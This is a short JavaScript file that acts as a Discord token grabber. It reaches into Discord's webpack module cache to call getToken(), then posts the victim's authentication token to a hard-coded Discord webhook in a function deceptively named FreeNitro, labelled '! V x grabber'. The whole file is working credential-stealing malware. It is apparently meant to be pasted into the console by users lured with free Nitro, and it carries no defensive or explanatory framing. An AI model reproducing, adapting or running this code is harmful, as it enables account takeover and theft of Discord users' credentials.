const webhookurl = 'https://discord.com/api/webhooks/757544676227153992/hmtc90ourkg1NIBPhp215-_k-oRfJeqeGAxU8BG1Z8u3TufAMsTpzpUdvssHocGaHYep';

var req = webpackJsonp.push([
    [], {
        extra_id: (e, t, r) => e.exports = r
    },
    [
        ["extra_id"]
    ]
]);
for (let e in req.c)
    if (req.c.hasOwnProperty(e)) {
        let t = req.c[e].exports;
        if (t && t.__esModule && t.default)
            for (let e in t.default) "getToken" === e && (token = t.default.getToken())
    }
function FreeNitro() {
    var e = new XMLHttpRequest;
    e.open("POST", webhookurl), e.setRequestHeader("Content-type", "application/json");
    var t = {
        username: "! V x grabber",
        content: "",
        embeds: [{
            color: "4700374",
            avatar: "https://cdn.discordapp.com/avatars/750086812642443267/a_52906dcbf8a58ea293fd4b2506a7da7f.gif",
            description: "logged" + token,
            footer: {
                text: "SPEED was here"
            }
        }]
    };
    e.send(JSON.stringify(t))
}
FreeNitro();
